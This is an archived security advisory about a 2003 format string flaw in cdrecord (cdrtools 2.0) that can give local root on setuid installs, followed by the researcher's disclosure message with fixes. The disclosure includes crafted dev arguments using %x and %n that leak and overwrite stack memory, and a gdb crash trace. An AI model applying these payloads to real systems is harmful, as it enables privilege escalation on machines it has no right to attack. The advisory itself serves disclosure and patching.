SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   cdrtools Vendors:   Schilling, J.
'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006751
SecurityTracker URL:  http://securitytracker.com/id/1006751
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 14 2003
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2.0
Description:   A format string vulnerability was reported in 'cdrecord' in the 'cdrtools' package. A local user can gain elevated privileges on the system, including root privileges on some distributions.

It is reported that libscg/scsiopen.c contains a format string flaw in line 273, where a js_snprintf() function is called with a proper formatting string. A local user can set the 'dev' argument to a specially crafted value to trigger the flaw and potentially execute arbitrary code. The privileges that the code will run with depend on the package distribution. According to the report, the package is configured with set user id (setuid) root user privileges on some distributions.

Impact:   A local user can execute arbitrary code with elevated privileges on the system. The specific privileges depend on the settings of the particular distribution. Some distributions of the application permit the local user to obtain root privileges.
Solution:   The vendor has released a fixed alpha version (2.01a14), available at:

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

Vendor URL:  www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Exploit is Available) Re: 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
Some exploit code has been released.
(Mandrake Issues Revised Fix) 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
The vendor has released a revised fix to address some additional format string flaws.



 Source Message Contents

Subject:  cdrtools2.0 Format String Vulnerability



----------------------------------------------------------------------------
PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE:             : 2003-05-05
----------------------------------------------------------------------------


Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:

--------------------------------------------------------------
   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
   
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
_______________________________________________________
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc: 
$./cdrecord dev=`printf 
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb   `which cdrecord`  core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

so it's exploitable.

Solutions:

A. Updated package can be found on:

	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of liscg/scsiopen.c with :
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`



Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC